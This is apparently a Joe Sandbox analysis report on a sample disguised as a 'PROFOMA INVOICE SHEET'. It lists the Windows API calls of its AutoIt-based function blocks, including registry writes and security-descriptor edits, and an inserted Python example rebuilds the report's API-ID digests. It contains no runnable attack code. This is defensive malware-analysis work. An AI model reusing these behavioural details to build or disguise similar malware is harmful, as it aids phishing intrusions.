                                    • Instruction Fuzzy Hash: E1028B75A10204AFDB16DFA4CC89EAE7BB9FF49710F048159F915AB2A1CB71ED01CB60
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0039712F
                                    • GetSysColorBrush.USER32(0000000F), ref: 00397160
                                    • GetSysColor.USER32(0000000F), ref: 0039716C
                                    • SetBkColor.GDI32(?,000000FF), ref: 00397186
                                    • SelectObject.GDI32(?,?), ref: 00397195
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003971C0
                                    • GetSysColor.USER32(00000010), ref: 003971C8
                                    • CreateSolidBrush.GDI32(00000000), ref: 003971CF
                                    • FrameRect.USER32(?,?,00000000), ref: 003971DE
                                    • DeleteObject.GDI32(00000000), ref: 003971E5
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00397230
                                    • FillRect.USER32(?,?,?), ref: 00397262
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00397284
                                      • Part of subcall function 003973E8: GetSysColor.USER32(00000012), ref: 00397421
                                      • Part of subcall function 003973E8: SetTextColor.GDI32(?,?), ref: 00397425
                                      • Part of subcall function 003973E8: GetSysColorBrush.USER32(0000000F), ref: 0039743B
                                      • Part of subcall function 003973E8: GetSysColor.USER32(0000000F), ref: 00397446
                                      • Part of subcall function 003973E8: GetSysColor.USER32(00000011), ref: 00397463
                                      • Part of subcall function 003973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00397471
                                      • Part of subcall function 003973E8: SelectObject.GDI32(?,00000000), ref: 00397482
                                      • Part of subcall function 003973E8: SetBkColor.GDI32(?,00000000), ref: 0039748B
                                      • Part of subcall function 003973E8: SelectObject.GDI32(?,?), ref: 00397498
                                      • Part of subcall function 003973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003974B7
                                      • Part of subcall function 003973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003974CE
                                      • Part of subcall function 003973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003974DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: 81721acfbd1d1041df3fa8d1effb956a8b62c69d07d897adb70a5ca465e5921c
                                    • Instruction ID: 1c62082b13ddf26852c8a43cb601d8538634ee0f5071222c5c5a2ddbe494e299
                                    • Opcode Fuzzy Hash: 81721acfbd1d1041df3fa8d1effb956a8b62c69d07d897adb70a5ca465e5921c
                                    • Instruction Fuzzy Hash: E5A19372028301BFDB129F64DC48E5B7BADFF49320F101A1AF9A2961E1D772E944CB51
                                    APIs
                                    • DestroyWindow.USER32(?,?), ref: 00318E14
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00356AC5
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00356AFE
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00356F43
                                      • Part of subcall function 00318F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00318BE8,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318FC5
                                    • SendMessageW.USER32(?,00001053), ref: 00356F7F
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00356F96
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FAC
                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 2760611726-4108050209
                                    • Opcode ID: cb1cf62e9118162c32d58f5386677b9213a77ba2abd09a73eb09d7c782df3ef9
                                    • Instruction ID: 4b3fd9c7d949dae6cd7a61b23a062b06553c6d8f720bde7fc963ce9472f04dd4
                                    • Opcode Fuzzy Hash: cb1cf62e9118162c32d58f5386677b9213a77ba2abd09a73eb09d7c782df3ef9
                                    • Instruction Fuzzy Hash: 0412CE30601201EFCB27CF14D956FA5B7F9FB49302F95446AE8858B662CB32EC95CB91
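The API ID under Similarity is an address-independent digest of the API names a block calls, which is what lets blocks be matched across samples even when the code is relocated. The following is an added Python example, not part of the report or of the Joe Sandbox tooling, that parses API lines in the format of the listings above (direct calls and "Part of subcall function" lines alike) and rebuilds such a digest: each API name is split into CamelCase tokens, tokens shorter than four characters (Get, Set, Sys, W, Ex, ...) are dropped, an underscore-terminated prefix such as ImageList_ stays one token, tokens are grouped by descending frequency, sorted alphabetically within a group and the groups joined with "$". That rule is my reconstruction from the IDs visible on this page; it reproduces the API ID of the block directly above and of the splash-image block earlier on the page, but it is not a published algorithm and may diverge on other names. The nine sample lines are copied from the block directly above.

```python
"""Rebuild a Joe Sandbox-style "API ID" from a function block's API listing.

Added example, not part of the report or the Joe Sandbox tooling. The
tokenisation rule (CamelCase split, tokens shorter than 4 chars dropped,
"Name_" kept as one token, groups in descending frequency, alphabetical
within a group, joined with "$") is my reconstruction from the IDs visible
in this report, not a published algorithm.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(arg,arg), ref: XXXXXXXX"
API_RE = re.compile(
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SUBCALL_RE = re.compile(r"Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):")
# "ImageList_" stays one token; otherwise CamelCase words; a trailing run of caps (W, DCW) is a token.
TOKEN_RE = re.compile(r"[A-Z][A-Za-z]*?_|[A-Z][a-z]+|[A-Z]+(?![a-z])")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int
    caller: Optional[int]   # function containing the subcall, None for a direct call


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.search(line)
    if not m:
        return None
    raw = m["args"]
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    sub = SUBCALL_RE.search(line)
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                   int(sub["caller"], 16) if sub else None)


def tokens(api_name: str, min_len: int = 4) -> List[str]:
    return [t for t in TOKEN_RE.findall(api_name) if len(t) >= min_len]


def api_id(lines: Iterable[str]) -> str:
    """Frequency-ordered token digest; lines that are not API calls are ignored."""
    counts = Counter()
    for line in lines:
        call = parse_api_line(line)
        if call:
            counts.update(tokens(call.api))
    by_freq = defaultdict(list)
    for tok, n in counts.items():
        by_freq[n].append(tok)
    return "$".join("".join(sorted(by_freq[n])) for n in sorted(by_freq, reverse=True))


def modules(lines: Iterable[str]) -> Counter:
    """Which DLLs a block leans on (USER32/GDI32 here: AutoIt GUI runtime, not payload)."""
    return Counter(c.module for c in map(parse_api_line, lines) if c)


# Sample input: the nine API lines of the block directly above, copied verbatim.
IMAGELIST_BLOCK = [
    "• DestroyWindow.USER32(?,?), ref: 00318E14",
    "• SendMessageW.USER32(?,00001308,?,00000000), ref: 00356AC5",
    "• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00356AFE",
    "• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00356F43",
    "  • Part of subcall function 00318F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00318BE8,?,00000000,?,?,?,?,00318BBA,00000000,?), ref: 00318FC5",
    "• SendMessageW.USER32(?,00001053), ref: 00356F7F",
    "• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00356F96",
    "• ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FAC",
    "• ImageList_Destroy.COMCTL32(00000000,?), ref: 00356FB7",
]

if __name__ == "__main__":
    print(api_id(IMAGELIST_BLOCK))
    print(dict(modules(IMAGELIST_BLOCK)))
```

Because the digest counts subcall lines as well, a block's API ID changes when its callees change, which is the intended behaviour for matching whole functions rather than single call sites; to compare only the block's own calls, filter out entries whose caller is not None before digesting.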
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 0038273E
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0038286A
                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003828A9
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003828B9
                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00382900
                                    • GetClientRect.USER32(00000000,?), ref: 0038290C
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00382955
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00382964
                                    • GetStockObject.GDI32(00000011), ref: 00382974
                                    • SelectObject.GDI32(00000000,00000000), ref: 00382978
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00382988
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00382991
                                    • DeleteDC.GDI32(00000000), ref: 0038299A
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003829C6
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 003829DD
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00382A1D
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00382A31
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00382A42
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00382A77
                                    • GetStockObject.GDI32(00000011), ref: 00382A82
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00382A8D
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00382A97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: acd4ccc1842a2d9105120b2b728c3fd8a5adc55cfcfa3a0f7d8cdb42e59f9564
                                    • Instruction ID: c24537cb1ee7f16c2bf02b98bd74897833e2201c3bbd16e48c67198fcafd9860
                                    • Opcode Fuzzy Hash: acd4ccc1842a2d9105120b2b728c3fd8a5adc55cfcfa3a0f7d8cdb42e59f9564
                                    • Instruction Fuzzy Hash: 45B16A75A10205AFEB15DFA8DC4AFAFBBA9EB08710F008155F914EB2D0D770AD40CBA0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00374AED
                                    • GetDriveTypeW.KERNEL32(?,0039CB68,?,\\.\,0039CC08), ref: 00374BCA
                                    • SetErrorMode.KERNEL32(00000000,0039CB68,?,\\.\,0039CC08), ref: 00374D36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: 3e8d38fe0e412d8612b7be8d75b02a1068d4e5625905c0c6bed805a64a61efb0
                                    • Instruction ID: 9203acbb8367966be748e4288a09e1c515648a188b12cc2660a5c92d8a86a153
                                    • Opcode Fuzzy Hash: 3e8d38fe0e412d8612b7be8d75b02a1068d4e5625905c0c6bed805a64a61efb0
                                    • Instruction Fuzzy Hash: 6961C431705206EBCB27DF18C996EA977A4AF44300B25C419F80BEB696DB39FD41DB41
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00397421
                                    • SetTextColor.GDI32(?,?), ref: 00397425
                                    • GetSysColorBrush.USER32(0000000F), ref: 0039743B
                                    • GetSysColor.USER32(0000000F), ref: 00397446
                                    • CreateSolidBrush.GDI32(?), ref: 0039744B
                                    • GetSysColor.USER32(00000011), ref: 00397463
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00397471
                                    • SelectObject.GDI32(?,00000000), ref: 00397482
                                    • SetBkColor.GDI32(?,00000000), ref: 0039748B
                                    • SelectObject.GDI32(?,?), ref: 00397498
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003974B7
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003974CE
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003974DB
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039752A
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00397554
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00397572
                                    • DrawFocusRect.USER32(?,?), ref: 0039757D
                                    • GetSysColor.USER32(00000011), ref: 0039758E
                                    • SetTextColor.GDI32(?,00000000), ref: 00397596
                                    • DrawTextW.USER32(?,003970F5,000000FF,?,00000000), ref: 003975A8
                                    • SelectObject.GDI32(?,?), ref: 003975BF
                                    • DeleteObject.GDI32(?), ref: 003975CA
                                    • SelectObject.GDI32(?,?), ref: 003975D0
                                    • DeleteObject.GDI32(?), ref: 003975D5
                                    • SetTextColor.GDI32(?,?), ref: 003975DB
                                    • SetBkColor.GDI32(?,?), ref: 003975E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: 8861d8c7bf9d9e20e4bf1920614eb895ad18051906a9465e124d32ae33897cbd
                                    • Instruction ID: 1c470c1f6956862cdc7300d6ca06c7cbd7226dee134a6007022a57f9ef20db4f
                                    • Instruction Fuzzy Hash: 72616C72910218AFDF029FA4DC49EEEBFB9EB09320F115116F915AB2E1D7719940CFA0
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00391128
                                    • GetDesktopWindow.USER32 ref: 0039113D
                                    • GetWindowRect.USER32(00000000), ref: 00391144
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00391199
                                    • DestroyWindow.USER32(?), ref: 003911B9
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003911ED
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0039120B
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0039121D
                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00391232
                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00391245
                                    • IsWindowVisible.USER32(00000000), ref: 003912A1
                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003912BC
                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003912D0
                                    • GetWindowRect.USER32(00000000,?), ref: 003912E8
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0039130E
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00391328
                                    • CopyRect.USER32(?,?), ref: 0039133F
                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 003913AA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: f6287c2272f75661738c20343c68ef0a3de630e506beaeda8eca43feb332ea31
                                    • Instruction ID: 77378565e1f9b4088d4cbf6cab0ac1159feda0fcba46904cd911d2d274687781
                                    • Instruction Fuzzy Hash: FAB18C71608341AFDB11DF64C884B6AFBE4FF88354F008919F999AB2A1CB71EC44CB91
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00318968
                                    • GetSystemMetrics.USER32(00000007), ref: 00318970
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031899B
                                    • GetSystemMetrics.USER32(00000008), ref: 003189A3
                                    • GetSystemMetrics.USER32(00000004), ref: 003189C8
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003189E5
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003189F5
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00318A28
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00318A3C
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00318A5A
                                    • GetStockObject.GDI32(00000011), ref: 00318A76
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00318A81
                                      • Part of subcall function 0031912D: GetCursorPos.USER32(?), ref: 00319141
                                      • Part of subcall function 0031912D: ScreenToClient.USER32(00000000,?), ref: 0031915E
                                      • Part of subcall function 0031912D: GetAsyncKeyState.USER32(00000001), ref: 00319183
                                      • Part of subcall function 0031912D: GetAsyncKeyState.USER32(00000002), ref: 0031919D
                                    • SetTimer.USER32(00000000,00000000,00000028,003190FC), ref: 00318AA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: e805f9a43e52be58a6bd2439b3a3065a02c3203de75386a13e5dc8a5d58ef6e2
                                    • Instruction ID: c0829a0bace7fdd2a684fe16696bbf02462ac18214f755ccd2c288704be61753
                                    • Instruction Fuzzy Hash: EBB16075A00209AFDB16DFA8DC55BEE7BB9FB48315F11421AFA1597290DB30D840CB54
                                    APIs
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                      • Part of subcall function 003610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                      • Part of subcall function 003610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                      • Part of subcall function 003610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00360DF5
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00360E29
                                    • GetLengthSid.ADVAPI32(?), ref: 00360E40
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00360E7A
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00360E96
                                    • GetLengthSid.ADVAPI32(?), ref: 00360EAD
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00360EB5
                                    • HeapAlloc.KERNEL32(00000000), ref: 00360EBC
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00360EDD
                                    • CopySid.ADVAPI32(00000000), ref: 00360EE4
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00360F13
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00360F35
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00360F47
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F6E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F75
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F7E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F85
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360F8E
                                    • HeapFree.KERNEL32(00000000), ref: 00360F95
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00360FA1
                                    • HeapFree.KERNEL32(00000000), ref: 00360FA8
                                      • Part of subcall function 00361193: GetProcessHeap.KERNEL32(00000008,00360BB1,?,00000000,?,00360BB1,?), ref: 003611A1
                                      • Part of subcall function 00361193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00360BB1,?), ref: 003611A8
                                      • Part of subcall function 00361193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00360BB1,?), ref: 003611B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: f513dd4abb4a021583b6240d5a8207ac6f51b34e9b5a1ff3bfacac2344f96ac4
                                    • Instruction ID: 48f5c301536ba15b6827a2c666edd36e1cb53277bbc53b19544ec0275afa5cbc
                                    • Instruction Fuzzy Hash: D4715B7290021AEBDF26DFA4DC49FAFBBBCBF05300F058115F919AA295D7729905CB60
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038C4BD
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0039CC08,00000000,?,00000000,?,?), ref: 0038C544
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0038C5A4
                                    • _wcslen.LIBCMT ref: 0038C5F4
                                    • _wcslen.LIBCMT ref: 0038C66F
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0038C6B2
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0038C7C1
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0038C84D
                                    • RegCloseKey.ADVAPI32(?), ref: 0038C881
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038C88E
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0038C960
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 9721498-966354055
                                    • Opcode ID: 104530847d359d5a9f7b57b811441639910b470d3a033433318794fdd2b7b5ab
                                    • Instruction ID: bbf154ea776239f5da296eb3553acde7af0ec9da74f8c67b896494ab280940b4
                                    • Instruction Fuzzy Hash: 26127A356143019FDB16EF14C891A2AB7E5EF89714F05889DF88A9B3A2DB31FC41CB91
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 003909C6
                                    • _wcslen.LIBCMT ref: 00390A01
